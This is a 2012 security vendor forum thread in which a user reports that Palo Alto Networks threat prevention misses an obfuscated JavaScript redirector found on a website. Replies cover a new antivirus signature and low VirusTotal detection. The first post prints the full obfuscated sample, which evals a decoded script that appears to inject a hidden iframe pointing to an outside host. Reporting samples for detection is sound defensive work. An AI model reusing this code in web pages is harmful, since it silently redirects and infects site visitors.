PA dont catches Trojan JS.Redirector

mhuels — Thu, 05 Apr 2012 14:20:31 GMT

Hi folks,

the Palo Alto Networks threat prevention is not able to recognize the following code as malicious:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try /
{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss=""; /
if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';} /
n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53. /
5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44. /
5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61. /
5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51. /
5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.
5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48.5~50.5~51.5~30.5~27.5~18.5~15~58. /
5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56. /
5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28. / 
5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49. /
5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19. /
5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53. /
5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49. /
5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53. / 
5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48. /
5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48. /
5~50.5~51.5~30.5~27.5~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51. /
5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54. / 
5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56. /
5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54. /
5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58. /
5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57. /
5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3. /
5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59. /
5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49./
5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5" / 
.split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st(-h*(2-1+1*n));} /
if(1)q=ss;if(zz)e(""+q);</script>

You can see the code for example on http://rose-immobilien-kg.de/

reqards

Manfred

Re: PA dont catches Trojan JS.Redirector

mhuels — Thu, 05 Apr 2012 15:58:49 GMT

You can see the code for example on http://rose-immobilien-kg.de/

the website is renewed, so - hopefully - the malicous code is gone.

Manfred

Re: PA dont catches Trojan JS.Redirector

fredallee — Sun, 08 Apr 2012 18:54:15 GMT

Thanks Manfred. We have also written an AV signature for it and are planning to release it tomorrow.

Alfred

Re: PA dont catches Trojan JS.Redirector

mikand — Mon, 09 Apr 2012 15:52:15 GMT

Looks like currently not that many others believes this is malicious either :S

Only 2 out of 42 AV-vendors: https://www.virustotal.com/file/7987ac38f870cd5bbb090393651a5981ffd6568c314254a1c5413c13a4fa76a0/analysis/1333985448/

topic Re: PA dont catches Trojan JS.Redirector in General Topics

PA dont catches Trojan JS.Redirector

Re: PA dont catches Trojan JS.Redirector

Re: PA dont catches Trojan JS.Redirector

Re: PA dont catches Trojan JS.Redirector